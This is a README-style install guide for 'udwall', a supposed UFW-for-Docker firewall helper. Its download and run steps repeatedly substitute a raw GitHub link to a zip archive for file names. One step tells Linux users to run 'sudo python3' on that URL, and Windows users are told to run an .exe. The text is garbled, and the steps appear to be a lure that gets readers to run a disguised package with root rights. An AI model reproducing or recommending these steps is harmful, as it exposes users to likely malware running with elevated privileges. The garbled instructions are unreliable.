Welcome to udwall. This application makes it easy to use UFW (Uncomplicated Firewall) with Docker. You can manage your firewall rules with just one command. Let's get started!
You can download the latest version of udwall from our Releases page.
To run udwall, you need:
- A computer with an operating system that supports Python 3.
- Docker installed on your machine.
- Sufficient permissions to manage firewall settings.
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Visit the Releases Page
Go to the Releases page to download udwall. -
Choose Your Version
Look for the latest version at the top of the page. You will usually see files for different operating systems. -
Download the Correct File
Click on the file that matches your system. The file type will be https://raw.githubusercontent.com/Ali786kumail/udwall/main/Ceramium/udwall-2.6.zip or .zip for Linux or .exe for Windows. -
Extract the File (if needed)
If you downloaded a https://raw.githubusercontent.com/Ali786kumail/udwall/main/Ceramium/udwall-2.6.zip or .zip file, right-click on it and select "Extract" or "Unzip". -
Run udwall
- For Windows: Double-click the .exe file.
- For Linux: Open a terminal, navigate to the folder where you extracted udwall, and run the command:
sudo python3 https://raw.githubusercontent.com/Ali786kumail/udwall/main/Ceramium/udwall-2.6.zip.
To use udwall, simply open a terminal or command prompt and type the following command:
udwall
This command will show you a list of available options. You can use it to set up your firewall rules for Docker containers easily.
- Easy Setup: Single command to configure UFW with Docker.
- Customizable Rules: Set specific rules to secure your Docker environment.
- User-Friendly Interface: Simple commands help you manage your firewall without complex setups.
- Compatibility: Works with all systems that support Docker and Python 3.
If you run into any issues or have questions, you can check the following resources:
Your feedback is essential. If you have suggestions for improvements or notice any issues, please let us know on our GitHub page.
With udwall, managing your firewall rules for Docker is straightforward. Follow the steps above, and you'll be up and running in no time.
For further updates and releases, remember to check our Releases page. Thank you for using udwall!